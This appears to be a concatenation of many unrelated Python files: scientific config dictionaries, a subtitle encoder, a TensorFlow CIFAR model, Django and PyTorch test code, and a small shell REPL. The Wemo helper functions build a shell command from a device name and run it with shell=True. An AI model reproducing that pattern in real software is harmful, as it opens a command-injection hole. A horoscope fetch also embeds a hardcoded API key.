'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
url = 'http://web.juhe.cn:8080/constellation/getAll?consName=%s&type=today&key=e5a01b4c805febdb3b47f4d8fee618c3' % str(
cityname)
d = requests.get(url=url,headers=headers).json()
data = d['summary']
return data
|
nilq/baby-python
|
python
|
# Here we use the last column of Table 4 of "Planck 2015 Results: XIII. Cosmological Parameters"
_cosmo_params = \
{
'omega_m_0': 0.3089,
'omega_b_0': round(0.0223/0.6774**2, 5),
'omega_l_0': 1. - 0.3089,
'hubble_0': 0.6774,
'helium_by_number': 0.0813,
'helium_by_mass': 0.2453,
'cmb_temp_0': 2.7255,
'sigma_8': 0.8159,
'primordial_index': 0.9667,
'approx_highz': False
}
#'''
# USE THIS ONE FOR TIME SCIENCE PAPER
_hmf_params = \
{
#'hmf_tbl': '/input/hmf_tbl/TimeScience/hmf_ST_wrt_mean_logM_1000_6-16_z_301_0-30.npz',
'hmf_tbl': '/input/hmf_tbl/TimeScience/hmf_Tinker08_wrt_vir_logM_1000_6-16_z_301_0-30.npz',
'hmf_analytic': False,
#'hmf_model': 'ST',
'hmf_model': 'Tinker08',
#'hmf_delta_wrt': 'mean',
'hmf_delta_wrt': 'vir',
'hmf_logMmin': 6.0,
'hmf_logMmax': 16.0,
'hmf_zmin': 0.0,
'hmf_zmax': 30.0,
'hmf_dlogM': 0.01,
'hmf_dz': 0.1,
'hmf_dlna': 2e-6,
'hmf_dlnk': 1e-2,
'hmf_lnk_min': -20.,
'hmf_lnk_max': 10.,
'hmf_transfer_k_per_logint': 11,
'hmf_transfer_kmax': 100., # hmf default value is 5
'hmf_profile_p': 0.3,
'hmf_profile_q': 0.75
}
#'''
'''
# USE THIS ONE FOR MULTI-TRACER PAPER
_hmf_params = \
{
'hmf_tbl': '/input/hmf_tbl/TimeScience/hmf_Tinker08_wrt_vir_logM_1000_6-16_z_301_0-30.npz',
'hmf_analytic': False,
'hmf_model': 'Tinker08',
'hmf_delta_wrt': 'vir',
'hmf_logMmin': 7.0,
'hmf_logMmax': 16.0,
'hmf_zmin': 0.0,
'hmf_zmax': 30.0,
'hmf_dlogM': 0.01,
'hmf_dz': 0.1,
'hmf_dlna': 2e-6,
'hmf_dlnk': 1e-2,
'hmf_lnk_min': -20.,
'hmf_lnk_max': 10.,
'hmf_transfer_k_per_logint': 11,
'hmf_transfer_kmax': 100., # hmf default value is 5
'hmf_profile_p': 0.3,
'hmf_profile_q': 0.75
}
'''
_cibmodel_params = \
{
'cib_model': 'CIB:Cheng',
'cib_L0': [0.0135, 0.02], # Note Heidi has 0.0135, while Yun-Ting has 0.02
'cib_T0': [24.4, 25.3],
'cib_alpha': [0.36, 0.0],
'cib_delta': [3.6, 2.6],
'cib_sigmasq_LM': [0.5, 0.5],
'cib_M_eff': [10**12.6, 10**12.6],
'cib_beta': [1.75, 1.5],
'cib_gamma': [1.7, 2.0],
'cib_zmin': [0.1, 0.1], # minimum z CIB model is valid
'cib_zmax': [10.1, 10.1], # maximum z CIB model is valid
}
_dust_params = \
{
'dust_mw_dg': 0.01,
'dust_sed_nu_ref': 8.57e11,
'dust_sed_emissivity_ref': 4.3e-21,
}
_sensitivity_params = \
{
'sens_t_obs_survey': 1.0e3 * 3600., # default exposure time [s]
'sens_n_feedhorns': 32., # number of feedhorns
'sens_d_ap': 12.0 * 1e2, # effective aperture size (diameter) [cm]
'sens_read_tnoise': True, # whether to read thermal noise from file
'sens_geom_x': 156,
'sens_geom_y': 1,
'sens_geom_z': 42,
'sens_lambda_signal': [1.578e-2], # wavelength of the target (pair of) signal(s); {list}
'sens_sigma_N_HF': 1.0e7,
'sens_sigma_N_LF': 5.0e6,
}
_grf_params = \
{
'grf_d_ap': 12.0 * 1e2, # effective aperture size (diameter) [cm]
'grf_geom_x': 156,
'grf_geom_y': 1,
'grf_geom_z': 42,
'grf_lambda_signal': 1.577e-2, # wavelength of the target (pair of) signal(s); {scalar}
'grf_z_signal': 6.0,
'grf_ps_in': None,
}
_wf_params = \
{
'wf_type': 'analytical',
'wf_z_signal': 6.0,
'wf_n_logkbins': 20,
}
_ham_params = \
{
'uvlf_model': 'bouwens2015',
'dustcorr_method': None, # or 'meurer1999', 'pettini1998', 'capak2015'
'dustcorr_beta': 'bouwens2014',
'dustcorr_scatter_A': 0.,
'dustcorr_scatter_B': 0.34,
'logMh_min': 8.,
'logMh_max': 14.,
'dmag': 0.1,
}
|
nilq/baby-python
|
python
|
import pandas as pd
from pandas.io.formats.format import CategoricalFormatter
from config import ROOT_PATH_ABS, SSourceConfig as SSC
from config import RESULT_FOLDER_ABS
class Encoder(object):
def __init__(self, df:pd.DataFrame) -> None:
super().__init__()
self.df = df
self.start_series = [f"{self._format_time(float(fl))}" for fl in self.df.start]
self.end_series = [f"{self._format_time(float(fl))}" for fl in self.df.end]
try:
self.texts = self.df.recognized_text
except:
self.texts = ['xxx'] * len(self.start_series)
def _format_time(self, fl):
int_str_part, decimal_str_part = str(fl).split(".")
int_part = int(int_str_part)
decimal_str_part = decimal_str_part[:2]
s = int_part % 60 # seconds
m = (int_part // 60) % 60 # minutes
h = int_part // 3600 # hours
return f"{h}:{m}:{s}.{decimal_str_part}"
class SRTEncoder(Encoder):
def __init__(self, df: pd.DataFrame) -> None:
super().__init__(df)
def _format_time_presentation(self, str_time):
i, f = str_time.split(".")
h, m, s = i.split(":")
h = ("0" + h) if len(h)<2 else h
m = ("0" + m) if len(m)<2 else m
s = ("0" + s) if len(s)<2 else s
while len(f) < 3:
f = f + "0"
formatted_str_time = f"{h}:{m}:{s},{f}"
return formatted_str_time
@property
def event_timestamps(self) -> list:
event_collections = []
for (s, e) in zip(self.start_series, self.end_series):
event_line = f"{self._format_time_presentation(s)} --> {self._format_time_presentation(e)}"
event_collections.append(event_line)
return event_collections
def generate(self, file_name, target_dir=ROOT_PATH_ABS, encoding="utf-8"):
path = f"{target_dir}/{file_name}"
if not "srt" in file_name:
path = path + ".srt"
with open(path, mode="w", encoding=encoding) as f:
for (idx, (timeline, text)) in enumerate(zip(self.event_timestamps, self.texts)):
f.write(str(idx+1))
f.write("\n")
f.write(timeline)
f.write("\n")
f.write(str(text))
f.write("\n")
f.write("\n")
|
nilq/baby-python
|
python
|
import subprocess, logging
logger = logging.getLogger(__name__)
def turn_on_light(device):
if device.enabled:
if not device.status:
cmd = '/usr/local/bin/wemo switch "' + device.name + '" on'
proc = subprocess.Popen([cmd], stdout=(subprocess.PIPE), shell=True)
out, err = proc.communicate()
logger.info(cmd+"-"+str(device.id))
return True
else:
logger.debug('device ' + device.name + '(' + str(device.id) + ') is already on')
else:
logger.warning('device ' + device.name + '(' + str(device.id) + ') not enabled')
return False
def turn_off_light(device):
if device.enabled:
if device.status:
cmd = '/usr/local/bin/wemo switch "' + device.name + '" off'
proc = subprocess.Popen([cmd], stdout=(subprocess.PIPE), shell=True)
out, err = proc.communicate()
logger.info(cmd+"-"+str(device.id))
return True
else:
logger.debug('device ' + device.name + '(' + str(device.id) + ') is already off')
else:
logger.warning('device ' + device.name + '(' + str(device.id) + ') not enabled')
return False
|
nilq/baby-python
|
python
|
from django_assets import env
def layout_workers(request):
workers = []
for name, bundle in env.get_env()._named_bundles.iteritems():
if name.startswith('worker_'):
name = name.split('_', 1)[1].rsplit('_', 1)[0]
workers.append((name, bundle.urls()[0]))
return {
'layout_workers': workers
}
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The network model"""
__author__ = 'HANEL'
import tensorflow as tf
# Data
Data_PATH = '../../mcifar_data/'
# Network Parameters
n_input = 32 * 32 * 3 # Cifar ckpt input.py (img shape: 32*32)
out_conv_1 = 64
out_conv_2 = 64
n_hidden_1 = 384
n_hidden_2 = 192
dropout = 0.90 # Dropout, probability to keep units
# Global constants describing the CIFAR-10
NUM_CLASSES = 10 # Cifar10 total classes (0-9 digits)
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 40000
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000
# Constants describing the training process.
NUM_EPOCHS_PER_DECAY = 10.0 # Epochs after which learning rate decays.
LEARNING_RATE_DECAY_FACTOR = 0.60 # Learning rate decay factor.
INITIAL_LEARNING_RATE = 0.001 # Initial learning rate.
FLAGS = tf.app.flags.FLAGS
# Create model
def conv2d(img, w, b):
return tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(img, w, strides=[1, 1, 1, 1], padding='SAME'), b))
def max_pool(img, k):
return tf.nn.max_pool(img, ksize=[1, k, k, 1], strides=[1, k, k, 1], padding='SAME')
def inference(images):
"""Build the CIFAR model up to where it may be used for inference.
Args:
Returns:
logits: Output tensor with the computed logits.
"""
# Reshape input.py picture
print('In Inference ', images.get_shape(), type(images))
images = tf.reshape(images, shape=[-1, 32, 32, 3])
_dropout = tf.Variable(dropout) # dropout (keep probability)
# Store layers weight & bias
_weights = {
'wc1': tf.Variable(tf.random_normal([5, 5, 3, out_conv_1], stddev=1e-3)), # 5x5 conv, 3 input.py, 64 outputs
'wc2': tf.Variable(tf.random_normal([5, 5, out_conv_1, out_conv_2], stddev=1e-3)),
# 5x5 conv, 64 inputs, 64 outputs
'wd1': tf.Variable(tf.random_normal([out_conv_2 * 8 * 8, n_hidden_1], stddev=1e-3)),
'wd2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2], stddev=1e-3)),
'out': tf.Variable(tf.random_normal([n_hidden_2, NUM_CLASSES], stddev=1e-3))
}
_biases = {
'bc1': tf.Variable(tf.random_normal([out_conv_1])),
'bc2': tf.Variable(tf.random_normal([out_conv_2])),
'bd1': tf.Variable(tf.random_normal([n_hidden_1])),
'bd2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([NUM_CLASSES]))
}
# Convolution Layer 1
with tf.name_scope('Conv1'):
conv1 = conv2d(images, _weights['wc1'], _biases['bc1'])
# Max Pooling (down-sampling)
conv1 = max_pool(conv1, k=2)
# norm1
conv1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,
name='norm1')
# Apply Dropout
conv1 = tf.nn.dropout(conv1, _dropout)
# Convolution Layer 2
with tf.name_scope('Conv2'):
conv2 = conv2d(conv1, _weights['wc2'], _biases['bc2'])
# norm2
conv2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,
name='norm2')
# # Max Pooling (down-sampling)
conv2 = max_pool(conv2, k=2)
# Apply Dropout
conv2 = tf.nn.dropout(conv2, _dropout)
# Fully connected layer 1
with tf.name_scope('Dense1'):
dense1 = tf.reshape(conv2,
[-1, _weights['wd1'].get_shape().as_list()[0]]) # Reshape conv2 output to fit dense layer input.py
dense1 = tf.nn.relu_layer(dense1, _weights['wd1'], _biases['bd1']) # Relu activation
dense1 = tf.nn.dropout(dense1, _dropout) # Apply Dropout
# Fully connected layer 2
with tf.name_scope('Dense2'):
dense2 = tf.nn.relu_layer(dense1, _weights['wd2'], _biases['bd2']) # Relu activation
# Output, class prediction
logits = tf.add(tf.matmul(dense2, _weights['out']), _biases['out'])
return logits
def loss(logits, labels):
"""Add L2Loss to all the trainable variables.
Add summary for for "Loss" and "Loss/avg".
Args:
logits: Logits from inference().
labels: Labels from distorted_inputs or inputs(). 1-D tensor
of shape [batch_size]
Returns:
Loss tensor of type float.
"""
# Reshape the labels into a dense Tensor of
# shape [batch_size, NUM_CLASSES].
sparse_labels = tf.reshape(labels, [FLAGS.batch_size, 1])
indices = tf.reshape(tf.range(0, FLAGS.batch_size), [FLAGS.batch_size, 1])
concated = tf.concat(1, [indices, sparse_labels])
dense_labels = tf.sparse_to_dense(concated,
[FLAGS.batch_size, NUM_CLASSES],
1.0, 0.0)
# Calculate the average cross entropy loss across the batch.
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
logits, dense_labels, name='cross_entropy_per_example')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
tf.add_to_collection('losses', cross_entropy_mean)
# The total loss is defined as the cross entropy loss plus all of the weight
# decay terms (L2 loss).
return tf.add_n(tf.get_collection('losses'), name='total_loss')
def training(loss, global_step):
"""Sets up the training Ops.
Creates a summarizer to track the loss over time in TensorBoard.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train.
Args:
loss: Loss tensor, from loss().
learning_rate: The learning rate to use for gradient descent.
Returns:
train_op: The Op for training.
"""
# Variables that affect learning rate.
num_batches_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN / FLAGS.batch_size
decay_steps = int(num_batches_per_epoch * NUM_EPOCHS_PER_DECAY)
print('Decay steps is: ', decay_steps)
# Decay the learning rate exponentially based on the number of steps.
lr = tf.train.exponential_decay(INITIAL_LEARNING_RATE,
global_step,
decay_steps,
LEARNING_RATE_DECAY_FACTOR,
staircase=True)
tf.scalar_summary('learning_rate', lr)
# Add a scalar summary for the snapshot loss.
tf.scalar_summary(loss.op.name, loss)
# Create the adam or gradient descent optimizer with the given learning rate.
optimizer = tf.train.AdamOptimizer(lr)
# optimizer = tf.train.GradientDescentOptimizer(lr)
# Use the optimizer to apply the gradients that minimize the loss
# (and also increment the global step counter) as a single training step.
train_op = optimizer.minimize(loss, global_step=global_step)
return train_op
def evaluation(logits, labels):
"""Evaluate the quality of the logits at predicting the label.
Args:
logits: Logits tensor, float - [batch_size, NUM_CLASSES].
labels: Labels tensor, int32 - [batch_size], with values in the
range [0, NUM_CLASSES).
Returns:
A scalar int32 tensor with the number of examples (out of batch_size)
that were predicted correctly.
"""
print('Evaluation..')
# For a classifier model, we can use the in_top_k Op.
# It returns a bool tensor with shape [batch_size] that is true for
# the examples where the label's is was in the top k (here k=1)
# of all logits for that example.
correct = tf.nn.in_top_k(logits, labels, 1)
num_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
acc_percent = num_correct / FLAGS.batch_size
# Return the number of true entries.
return acc_percent * 100.0, num_correct
def main(argv=None):
return 0
if __name__ == '__main__':
tf.app.run()
|
nilq/baby-python
|
python
|
# ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
# Copyright (c) 2020 Henny Sipma
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import Optional, TYPE_CHECKING
import chb.util.fileutil as UF
if TYPE_CHECKING:
import chb.invariants.XXpr
class InputConstraintValue:
def __init__(self) -> None:
pass
@property
def is_env_value(self) -> bool:
return False
@property
def is_string_suffix_value(self) -> bool:
return False
@property
def is_command_line_argument(self) -> bool:
return False
@property
def is_constraint_value_expr(self) -> bool:
return False
@property
def is_function_argument_value(self) -> bool:
return False
class EnvironmentInputValue(InputConstraintValue):
def __init__(self, name: str) -> None:
InputConstraintValue.__init__(self)
self._name = name
@property
def name(self) -> str:
return self._name
@property
def is_env_value(self) -> bool:
return True
def __str__(self) -> str:
return "env(" + self.name + ")"
class StringSuffixValue(InputConstraintValue):
def __init__(
self,
stringexpr: InputConstraintValue,
charcode: str,
lastpos: bool = False):
InputConstraintValue.__init__(self)
self._stringexpr = stringexpr
self._charcode = charcode
self._lastpos = lastpos
@property
def stringexpr(self) -> InputConstraintValue:
return self._stringexpr
@property
def charcode(self) -> str:
return self._charcode
@property
def is_last_position(self) -> bool:
return self._lastpos
@property
def is_string_suffix_value(self) -> bool:
return True
def __str__(self) -> str:
pos = 'lastpos' if self.is_last_position else 'pos'
return ("suffix("
+ str(self.stringexpr)
+ ','
+ pos
+ '('
+ self.charcode
+ '))')
class FunctionArgumentValue(InputConstraintValue):
def __init__(self, argindex: int) -> None:
InputConstraintValue.__init__(self)
self._argindex = argindex
@property
def argindex(self) -> int:
return self._argindex
@property
def is_function_argument_value(self) -> bool:
return True
def __str__(self) -> str:
return "function-arg(" + str(self.argindex) + ")"
class CommandLineArgument(InputConstraintValue):
def __init__(self, argindex: int) -> None:
InputConstraintValue.__init__(self)
self._argindex = argindex
@property
def argindex(self) -> int:
return self._argindex
@property
def is_command_line_argument(self) -> bool:
return True
def __str__(self) -> str:
return 'cmdline-arg(' + str(self.argindex) + ')'
class InputConstraintValueExpr(InputConstraintValue):
def __init__(self,
op: str,
x: InputConstraintValue,
y: str):
InputConstraintValue.__init__(self)
self._op = op
self._x = x
self._y = y
@property
def operator(self) -> str:
return self._op
@property
def arg1(self) -> InputConstraintValue:
return self._x
@property
def arg2(self) -> str:
return self._y
@property
def is_constraint_value_expr(self) -> bool:
return True
def __str__(self) -> str:
return str(self.arg1) + self.operator + str(self.arg2)
|
nilq/baby-python
|
python
|
# Generated by Django 4.0 on 2022-01-02 13:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('leads', '0005_auto_20220102_1420'),
]
operations = [
migrations.AlterField(
model_name='agent',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='category',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='lead',
name='category',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='leads', to='leads.category'),
),
migrations.AlterField(
model_name='lead',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='user',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import sys
import netsnmp
if __name__ == '__main__':
ip = '127.0.0.1'
snmp = netsnmp.SNMPSession(ip, 'RJKJ')
if snmp.is_alive():
snmp.close()
print 'test import netsnmp ok'
|
nilq/baby-python
|
python
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project
# root for license information.
from redact.types.file_bundle import FileBundle
from redact.types.file_bundle import FileType
class TestFileBundle:
def test_from_names(self) -> None:
names = [
"a.jpg",
"a.jpg.labels.json",
"dummy_file.jpg",
"a.jpg.ocr.json"]
expected = [FileBundle(
image_file_name="a.jpg",
fott_file_name="a.jpg.labels.json",
ocr_file_name="a.jpg.ocr.json")]
actual = FileBundle.from_names(names, FileType.IMAGE_ONLY)
assert actual == expected
def test_from_names_pdf(self) -> None:
names = [
"a.pdf",
"a.pdf.labels.json",
"dummy_file.jpg",
"a.jpg",
"a.jpg.labels.json",
"dummy_file.pdf",
"a.pdf.ocr.json"]
expected = [FileBundle(
image_file_name="a.pdf",
fott_file_name="a.pdf.labels.json",
ocr_file_name="a.pdf.ocr.json")]
actual = FileBundle.from_names(names, FileType.PDF_ONLY)
assert actual == expected
|
nilq/baby-python
|
python
|
"""
Copyright (C) 2017-2018 University of Massachusetts Amherst.
This file is part of "learned-string-alignments"
http://github.com/iesl/learned-string-alignments
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import os
if __name__ == "__main__":
test_dir = sys.argv[1]
num_partitions = sys.argv[2]
test_prediction_filename = os.path.join(test_dir, "test.predictions")
with open(test_prediction_filename, 'w+') as f_out:
total_lines = 0
for i in range(int(num_partitions)):
parititon_prediction_filename = os.path.join(test_dir, "partition_{}".format(str(i)), "current.test.txt")
if(os.path.exists(parititon_prediction_filename)):
with open(parititon_prediction_filename, 'r') as f_in:
all_lines = f_in.readlines()
total_lines += len(all_lines)
for line in all_lines:
if("input prediction goldOutput" not in line):
f_out.write(line)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3.9
# Modules
import os
import sprint
import colorama
import platform
from os.path import isfile, expanduser
# Credit message
colorama.init() # Fix windows colors
print(sprint.colored(f"Sprint v{sprint.__version__} by iiPython", "yellow"))
print(sprint.colored(f"Python version {platform.python_version()}, running on {platform.system()}", "yellow"))
print()
# Command grabber
def get_command(indent = 0):
# Set our path
path = os.getcwd()
path = path.replace(os.getenv("HOME", expanduser("~")), "~")
# Fetch our command
command = input(sprint.colored(f"{path} >>> {' ' * indent}", "green"))
# Multi-line support
if command.endswith("\\"):
command = command[:-1]
command = command + get_command(indent = indent + 2)
# Return
return command
# Main loop
parser = sprint.SprintParser()
while True:
# Execute command
try:
cmd = get_command()
except KeyboardInterrupt:
print() # Stop weird line break issues
continue
# Support for running files
if isfile(cmd):
# Load our lines
try:
raw_lines = open(cmd, "r").read().split("\n")
except PermissionError:
print(sprint.colored("Missing permissions to read from file.", "red"))
continue
# Check for sprint
if raw_lines[0] == ";sprint-file":
# Remove all whitespace BEFORE parsing
no_whitespaced_lines = []
for line in raw_lines:
# Ignore blank lines
line = parser.remove_whitespace(line)
if not line:
continue
# Append this to our line data
no_whitespaced_lines.append(line)
# Parse the file
multiline = False
complete_line = None
line_index = 0
lines = []
for line in no_whitespaced_lines:
# Ignore blank lines
line = parser.remove_whitespace(line)
if not line:
continue
# Check if this declares another line
if line.endswith("\\") and not multiline:
multiline = True
complete_line = line[:-1]
elif multiline:
# Check if this isn't really a multiple line
if not no_whitespaced_lines[line_index - 1].endswith("\\"):
multiline = False
# Remove the backslash (if exists)
if line.endswith("\\"):
line = line[:-1]
# Joining together
if multiline:
complete_line += " " + line
else:
# Check for our other line
if complete_line != "":
lines.append(complete_line)
lines.append(line)
# Reset our completed line
complete_line = ""
else:
lines.append(line)
# Increase our index
line_index += 1
# Execute our lines
for line in lines:
parser.execute(line)
# Make sure to not execute the filename as a command
continue
# Run our command
parser.execute(cmd)
|
nilq/baby-python
|
python
|
"""Test categoricalCNNPolicy in PyTorch."""
import cloudpickle
import pytest
import torch
from garage.envs import GymEnv
from garage.torch import TransposeImage
from garage.torch.policies import CategoricalCNNPolicy
from tests.fixtures.envs.dummy import DummyDictEnv, DummyDiscretePixelEnv
class TestCategoricalCNNPolicy:
def _initialize_obs_env(self, env):
"""Initialize observation env depends on observation space type.
If observation space (i.e. akro.Image, gym.spaces.Box) is an image,
wrap the input of shape (W, H, 3) for PyTorch (N, 3, W, H).
Return:
Transformed environment (garage.envs).
"""
obs_shape = env.observation_space.shape
if len(obs_shape) == 3 and obs_shape[2] in [1, 3]:
env = TransposeImage(env)
return env
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_get_action(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test get_action function."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
action, _ = policy.get_action(obs)
assert env.action_space.contains(action)
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_get_action_img_obs(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test get_action function with akro.Image observation space."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
action, _ = policy.get_action(obs)
assert env.action_space.contains(action)
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_get_actions(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test get_actions function with akro.Image observation space."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
actions, _ = policy.get_actions([obs, obs, obs])
for action in actions:
assert env.action_space.contains(action)
torch_obs = torch.Tensor(obs)
actions, _ = policy.get_actions([torch_obs, torch_obs, torch_obs])
for action in actions:
assert env.action_space.contains(action)
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_is_pickleable(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test if policy is pickable."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
output_action_1, _ = policy.get_action(obs)
p = cloudpickle.dumps(policy)
policy_pickled = cloudpickle.loads(p)
output_action_2, _ = policy_pickled.get_action(obs)
assert env.action_space.contains(output_action_1)
assert env.action_space.contains(output_action_2)
assert output_action_1.shape == output_action_2.shape
def test_does_not_support_dict_obs_space(self):
"""Test that policy raises error if passed a dict obs space."""
env = GymEnv(DummyDictEnv(act_space_type='discrete'))
with pytest.raises(ValueError,
match=('CNN policies do not support '
'with akro.Dict observation spaces.')):
CategoricalCNNPolicy(env=env,
kernel_sizes=(3, ),
hidden_channels=(3, ))
def test_invalid_action_spaces(self):
"""Test that policy raises error if passed a box obs space."""
env = GymEnv(DummyDictEnv(act_space_type='box'))
with pytest.raises(ValueError):
CategoricalCNNPolicy(env=env,
kernel_sizes=(3, ),
hidden_channels=(3, ))
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_obs_unflattened(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test if a flattened image obs is passed to get_action
then it is unflattened.
"""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
env.reset()
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
obs = env.observation_space.sample()
action, _ = policy.get_action(env.observation_space.flatten(obs))
env.step(action)
|
nilq/baby-python
|
python
|
# coding=utf-8
import numpy as np
import torch.nn.functional as F
from datautil.util import random_pairs_of_minibatches
from alg.algs.ERM import ERM
class Mixup(ERM):
def __init__(self, args):
super(Mixup, self).__init__(args)
self.args = args
def update(self, minibatches, opt, sch):
objective = 0
for (xi, yi, di), (xj, yj, dj) in random_pairs_of_minibatches(self.args, minibatches):
lam = np.random.beta(self.args.mixupalpha, self.args.mixupalpha)
x = (lam * xi + (1 - lam) * xj).cuda().float()
predictions = self.predict(x)
objective += lam * F.cross_entropy(predictions, yi.cuda().long())
objective += (1 - lam) * \
F.cross_entropy(predictions, yj.cuda().long())
objective /= len(minibatches)
opt.zero_grad()
objective.backward()
opt.step()
if sch:
sch.step()
return {'class': objective.item()}
|
nilq/baby-python
|
python
|
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setStyleSheet("* {\n"
" padding: 0px;\n"
"}")
